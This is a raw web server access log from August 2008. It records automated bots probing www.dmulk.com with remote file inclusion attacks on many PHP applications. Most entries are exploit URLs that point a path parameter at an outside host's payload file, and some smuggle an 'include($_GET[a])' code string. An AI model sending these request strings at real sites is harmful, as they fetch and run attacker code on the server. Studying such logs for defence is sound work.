64.59.70.177 - - [10/Aug/2008:10:51:14 -0700] "GET /community/modules/agendax/addevent.inc.php?agendax_path=http://www.avm.su/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.59.70.177 - - [10/Aug/2008:10:51:16 -0700] "GET /logs/access_080221.log/community/modules/agendax/addevent.inc.php?agendax_path=http://www.avm.su/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.59.70.177 - - [10/Aug/2008:10:51:16 -0700] "GET /community/modules/agendax/addevent.inc.php?agendax_path=http://www.avm.su/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.59.70.177 - - [10/Aug/2008:10:51:17 -0700] "GET /logs/community/modules/agendax/addevent.inc.php?agendax_path=http://www.avm.su/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.248.189.82 - - [10/Aug/2008:10:51:24 -0700] "GET /logs/access_080127.log//convert/mvcw.php?step=1&vwar_root=http://paginas.terra.com.br/lazer/fatalzinh0/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.59.70.177 - - [10/Aug/2008:10:51:25 -0700] "GET /community/modules/agendax/addevent.inc.php?agendax_path=http://www.avm.su/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.198.149.178 - - [10/Aug/2008:10:51:41 -0700] "GET /logs/access_080325.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.82.247.252 - - [10/Aug/2008:10:52:00 -0700] "GET /logs/access_080219.log/munity/modules/agendax/addevent.inc.php?agendax_path=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.59.70.177 - - [10/Aug/2008:10:52:11 -0700] "GET /community/modules/agendax/addevent.inc.php?agendax_path=http://www.avm.su/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.59.70.177 - - [10/Aug/2008:10:52:22 -0700] "GET /logs/access_080225.log/community/modules/agendax/addevent.inc.php?agendax_path=http://www.avm.su/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.59.70.177 - - [10/Aug/2008:10:52:22 -0700] "GET /community/modules/agendax/addevent.inc.php?agendax_path=http://www.avm.su/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.59.70.177 - - [10/Aug/2008:10:52:22 -0700] "GET /logs/community/modules/agendax/addevent.inc.php?agendax_path=http://www.avm.su/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.59.70.177 - - [10/Aug/2008:10:52:27 -0700] "GET /logs/access_080302.log/community/modules/agendax/addevent.inc.php?agendax_path=http://www.avm.su/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.21.71.133 - - [10/Aug/2008:10:52:27 -0700] "GET /logs//convert/mvcw.php?step=1&vwar_root=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [10/Aug/2008:10:52:27 -0700] "GET /logs/access_080218.log//convert/mvcw.php?step=1&vwar_root=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [10/Aug/2008:10:52:27 -0700] "GET //convert/mvcw.php?step=1&vwar_root=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.59.70.177 - - [10/Aug/2008:10:53:06 -0700] "GET /logs/access_080229.log/community/modules/agendax/addevent.inc.php?agendax_path=http://www.avm.su/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.248.189.82 - - [10/Aug/2008:10:53:21 -0700] "GET /logs/access_071222.log//convert/mvcw.php?step=1&vwar_root=http://paginas.terra.com.br/lazer/fatalzinh0/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.57.154.47 - - [10/Aug/2008:10:53:22 -0700] "GET /logs/access_080313.log/?sourcedir=http://www.posidynegroup.com/.../image.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.57.154.47 - - [10/Aug/2008:10:53:25 -0700] "GET /?sourcedir=http://www.posidynegroup.com/.../image.txt? HTTP/1.1" 200 18365 "-" "libwww-perl/5.810" "www.dmulk.com"
69.57.154.47 - - [10/Aug/2008:10:53:25 -0700] "GET /logs/?sourcedir=http://www.posidynegroup.com/.../image.txt? HTTP/1.1" 200 59997 "-" "libwww-perl/5.810" "www.dmulk.com"
77.221.130.8 - - [10/Aug/2008:10:53:28 -0700] "GET /logs/access_080215.log/?step=1&vwar_root=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:10:53:28 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
77.221.130.8 - - [10/Aug/2008:10:53:30 -0700] "GET /?step=1&vwar_root=http://www.spanishvida.com/.../rid????? HTTP/1.1" 200 18427 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.8 - - [10/Aug/2008:10:53:31 -0700] "GET /logs/?step=1&vwar_root=http://www.spanishvida.com/.../rid????? HTTP/1.1" 200 59997 "-" "libwww-perl/5.803" "www.dmulk.com"
202.160.123.134 - - [10/Aug/2008:10:53:35 -0700] "GET /logs/access_080320.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://pa-lavvenireprato.it/administrator/components/com_remository/images/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.17.183 - - [10/Aug/2008:10:53:41 -0700] "GET / HTTP/1.0" 200 18241 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
69.42.218.66 - - [10/Aug/2008:10:53:48 -0700] "GET /logs/access_080324.log//modules/xfsection/modify.php?dir_module=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.42.218.66 - - [10/Aug/2008:10:53:48 -0700] "GET //modules/xfsection/modify.php?dir_module=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.42.218.66 - - [10/Aug/2008:10:53:48 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:10:54:00 -0700] "GET /logs/access_080404.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:10:54:00 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:10:54:00 -0700] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://89.106.91.4/sex.txt? HTTP/1.1" 200 18489 "-" "libwww-perl/5.76" "www.dmulk.com"
202.160.123.134 - - [10/Aug/2008:10:54:06 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://pa-lavvenireprato.it/administrator/components/com_remository/images/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.160.123.134 - - [10/Aug/2008:10:54:08 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://pa-lavvenireprato.it/administrator/components/com_remository/images/idilegal.txt??? HTTP/1.1" 200 18631 "-" "libwww-perl/5.79" "www.dmulk.com"
69.42.218.66 - - [10/Aug/2008:10:54:17 -0700] "GET /logs/access_080126.log//modules/xfsection/modify.php?dir_module=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.91.99.14 - - [10/Aug/2008:10:54:45 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.91.99.14 - - [10/Aug/2008:10:54:45 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.57.154.47 - - [10/Aug/2008:10:54:56 -0700] "GET /logs/access_080213.log/?sourcedir=http://www.posidynegroup.com/.../image.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
195.117.241.196 - - [10/Aug/2008:10:55:02 -0700] "GET /logs/access.log//index2.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.dijon-plomberie.com/tmp/cmdp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.117.241.196 - - [10/Aug/2008:10:55:03 -0700] "GET //index2.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.dijon-plomberie.com/tmp/cmdp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:10:55:10 -0700] "GET /logs/access_080229.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
84.21.71.133 - - [10/Aug/2008:10:55:36 -0700] "GET /logs//convert/mvcw.php?step=1&vwar_root=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [10/Aug/2008:10:55:38 -0700] "GET //convert/mvcw.php?step=1&vwar_root=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.117.241.196 - - [10/Aug/2008:10:55:38 -0700] "GET /logs/access.log/index2.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.dijon-plomberie.com/tmp/cmdp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [10/Aug/2008:10:55:38 -0700] "GET /logs/access_080218.log//convert/mvcw.php?step=1&vwar_root=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.117.241.196 - - [10/Aug/2008:10:55:39 -0700] "GET /index2.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.dijon-plomberie.com/tmp/cmdp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [10/Aug/2008:10:55:50 -0700] "GET /logs/access_071221.log//convert/mvcw.php?step=1&vwar_root=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.42.218.66 - - [10/Aug/2008:10:55:59 -0700] "GET /logs//common/db.php?commonpath=http://www.geocities.com/metal_lord64/bat/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
69.42.218.66 - - [10/Aug/2008:10:55:59 -0700] "GET //common/db.php?commonpath=http://www.geocities.com/metal_lord64/bat/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
195.117.241.196 - - [10/Aug/2008:10:56:37 -0700] "GET /logs/access.log//index2.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.dijon-plomberie.com/tmp/cmdp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.117.241.196 - - [10/Aug/2008:10:56:38 -0700] "GET //index2.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.dijon-plomberie.com/tmp/cmdp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:10:57:10 -0700] "GET /logs//main.php?sayfa=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:10:57:10 -0700] "GET //main.php?sayfa=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:10:57:13 -0700] "GET /logs//main.php?sayfa=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:10:57:13 -0700] "GET //main.php?sayfa=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:10:57:19 -0700] "GET /logs//main.php?sayfa=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:10:57:20 -0700] "GET //main.php?sayfa=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:10:57:20 -0700] "GET /logs//main.php?sayfa=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:10:57:20 -0700] "GET //main.php?sayfa=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.8 - - [10/Aug/2008:10:57:23 -0700] "GET /logs/access_080114.log/?step=1&vwar_root=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
190.54.62.66 - - [10/Aug/2008:10:57:27 -0700] "GET /logs//main.php?sayfa=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.54.62.66 - - [10/Aug/2008:10:57:28 -0700] "GET //main.php?sayfa=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.54.62.66 - - [10/Aug/2008:10:57:36 -0700] "GET /logs//main.php?sayfa=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.54.62.66 - - [10/Aug/2008:10:57:36 -0700] "GET //main.php?sayfa=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.54.62.66 - - [10/Aug/2008:10:57:39 -0700] "GET /logs//main.php?sayfa=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.54.62.66 - - [10/Aug/2008:10:57:39 -0700] "GET //main.php?sayfa=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.133.244.61 - - [10/Aug/2008:10:57:46 -0700] "GET /community/modules/agendax/addevent.inc.php?agendax_path=http://www.ecolnet.org/response.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.133.244.61 - - [10/Aug/2008:10:57:49 -0700] "GET /logs/access_080221.log/community/modules/agendax/addevent.inc.php?agendax_path=http://www.ecolnet.org/response.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.133.244.61 - - [10/Aug/2008:10:57:50 -0700] "GET /logs/community/modules/agendax/addevent.inc.php?agendax_path=http://www.ecolnet.org/response.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.54.62.66 - - [10/Aug/2008:10:57:53 -0700] "GET /logs//main.php?sayfa=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.54.62.66 - - [10/Aug/2008:10:57:54 -0700] "GET //main.php?sayfa=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.117.241.196 - - [10/Aug/2008:10:58:00 -0700] "GET /logs/access.log//?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.dijon-plomberie.com/tmp/cmdp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:10:58:00 -0700] "GET /logs//main.php?sayfa=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:10:58:01 -0700] "GET //main.php?sayfa=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.117.241.196 - - [10/Aug/2008:10:58:04 -0700] "GET //?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.dijon-plomberie.com/tmp/cmdp.txt?? HTTP/1.1" 200 3694 "-" "libwww-perl/5.805" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:10:58:07 -0700] "GET /logs/phphtml.php?htmlclass_path=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:10:58:12 -0700] "GET /phphtml.php?htmlclass_path=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:10:58:15 -0700] "GET /logs/access_080324.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:10:58:21 -0700] "GET /logs/access_080321.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
202.133.244.61 - - [10/Aug/2008:10:58:23 -0700] "GET /logs/access_080302.log/community/modules/agendax/addevent.inc.php?agendax_path=http://www.ecolnet.org/response.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.21.71.133 - - [10/Aug/2008:10:58:30 -0700] "GET /logs/access_071221.log//convert/mvcw.php?step=1&vwar_root=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.117.241.196 - - [10/Aug/2008:10:58:47 -0700] "GET /logs/access_080309.log//index2.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.dijon-plomberie.com/tmp/cmdp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.54.62.66 - - [10/Aug/2008:10:59:07 -0700] "GET /logs//main.php?sayfa=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.54.62.66 - - [10/Aug/2008:10:59:07 -0700] "GET //main.php?sayfa=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.117.241.196 - - [10/Aug/2008:10:59:29 -0700] "GET /logs/access_080309.log/index2.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.dijon-plomberie.com/tmp/cmdp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [10/Aug/2008:10:59:30 -0700] "GET /logs/access_080218.log//convert/mvcw.php?step=1&vwar_root=http://paginas.terra.com.br/lazer/fatalzinh0/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [10/Aug/2008:10:59:30 -0700] "GET /logs//convert/mvcw.php?step=1&vwar_root=http://paginas.terra.com.br/lazer/fatalzinh0/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [10/Aug/2008:10:59:34 -0700] "GET /logs/access_071221.log//convert/mvcw.php?step=1&vwar_root=http://paginas.terra.com.br/lazer/fatalzinh0/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [10/Aug/2008:10:59:37 -0700] "GET //convert/mvcw.php?step=1&vwar_root=http://paginas.terra.com.br/lazer/fatalzinh0/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.55.243.132 - - [10/Aug/2008:10:59:44 -0700] "GET /logs/access.log//include.php?path%5Bdocroot%5D=http://www.dijon-plomberie.com/tmp/cmdp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
195.55.243.132 - - [10/Aug/2008:10:59:45 -0700] "GET //include.php?path%5Bdocroot%5D=http://www.dijon-plomberie.com/tmp/cmdp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
195.55.243.132 - - [10/Aug/2008:10:59:46 -0700] "GET //?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.dijon-plomberie.com/tmp/cmdp.txt?? HTTP/1.1" 200 3694 "-" "libwww-perl/5.813" "www.dmulk.com"
64.59.70.177 - - [10/Aug/2008:11:00:08 -0700] "GET /logs/access_080209.log//index.php?lang=http://www.avm.su/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.59.70.177 - - [10/Aug/2008:11:00:10 -0700] "GET /logs/access_080209.log//index.php?lang=http://www.avm.su/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.59.70.177 - - [10/Aug/2008:11:00:10 -0700] "GET //index.php?lang=http://www.avm.su/id.txt?? HTTP/1.1" 200 18373 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.59.70.177 - - [10/Aug/2008:11:00:13 -0700] "GET //index.php?lang=http://www.avm.su/id.txt?? HTTP/1.1" 200 18373 "-" "libwww-perl/5.79" "www.dmulk.com"
202.160.123.134 - - [10/Aug/2008:11:00:13 -0700] "GET /logs/access_080123.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://pa-lavvenireprato.it/administrator/components/com_remository/images/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.59.70.177 - - [10/Aug/2008:11:00:13 -0700] "GET /logs//index.php?lang=http://www.avm.su/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.160.123.134 - - [10/Aug/2008:11:00:17 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://pa-lavvenireprato.it/administrator/components/com_remository/images/idilegal.txt??? HTTP/1.1" 200 18633 "-" "libwww-perl/5.79" "www.dmulk.com"
202.160.123.134 - - [10/Aug/2008:11:00:17 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://pa-lavvenireprato.it/administrator/components/com_remository/images/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:11:00:18 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
195.55.243.132 - - [10/Aug/2008:11:00:20 -0700] "GET //?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.dijon-plomberie.com/tmp/cmdp.txt?? HTTP/1.1" 200 3694 "-" "libwww-perl/5.813" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:11:00:23 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
195.117.241.196 - - [10/Aug/2008:11:00:34 -0700] "GET /logs/access_080309.log//index2.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.dijon-plomberie.com/tmp/cmdp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.15.10.22 - - [10/Aug/2008:11:00:41 -0700] "GET /logs//squirrelcart/cart.php/popup_window.php?site_isp_root=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
204.15.10.22 - - [10/Aug/2008:11:00:41 -0700] "GET //squirrelcart/cart.php/popup_window.php?site_isp_root=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
69.65.41.92 - - [10/Aug/2008:11:00:48 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://hortus-alere.dyndns.org/Home/components/com_frontpage/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
69.65.41.92 - - [10/Aug/2008:11:00:49 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://hortus-alere.dyndns.org/Home/components/com_frontpage/test.txt??? HTTP/1.1" 200 18593 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
77.232.68.17 - - [10/Aug/2008:11:00:53 -0700] "GET /logs/access_080221.log/addevent.inc.php?agendax_path=http://neomatrix.007gb.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.232.68.17 - - [10/Aug/2008:11:00:53 -0700] "GET /addevent.inc.php?agendax_path=http://neomatrix.007gb.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.232.68.17 - - [10/Aug/2008:11:00:53 -0700] "GET /logs/addevent.inc.php?agendax_path=http://neomatrix.007gb.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
